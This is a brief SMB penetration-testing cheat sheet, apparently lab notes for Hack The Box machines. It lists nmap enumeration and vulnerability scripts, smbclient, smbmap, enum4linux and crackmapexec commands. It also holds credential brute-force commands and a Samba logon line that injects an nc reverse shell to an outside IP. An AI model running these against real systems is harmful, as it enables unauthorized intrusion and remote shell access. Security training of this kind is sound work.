445 - SMB

Nmap

nmap -p 135,139,445 --script "smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-ls,smb-mbenum,smb-os-discovery,smb-print-text,smb-psexec,smb-protocols,smb-security-mode,smb-system-info,smb-double-pulsar-backdoor,smb-server-stats,smb-vuln*" IP

Brute force with nmap

nmap -sS -sU --script=smb-brute.nse -p U:137,T:139,445 <host> -n

nmap -sU -sS --script smb-brute.nse -p U:137,T:139 <host> -n

smb: \> logon "/=`nc 10.11.0.62 443 -e /bin/bash`"

To try

  • Enumeration with Metasploit

msf > use auxiliary/scanner/smb/smb_enumshares

  • Various enumeration tools

smbmap -H IP
enum4linux -a IP
nmblookup -A 192.168.1.1
nbtscan IP

  • SmbClient

smbclient -L //IP
smbclient //192.168.1.2/myshare -U anonymous

  • Crackmapexec

crackmapexec smb IP

// using credentials

crackmapexec smb IP -u username -p password

Tools

  • SMBClient

  • SMBMap

  • SMBpassword

Solved machines that use SMB

• HTB - ypuffy

• HTB - Bastion
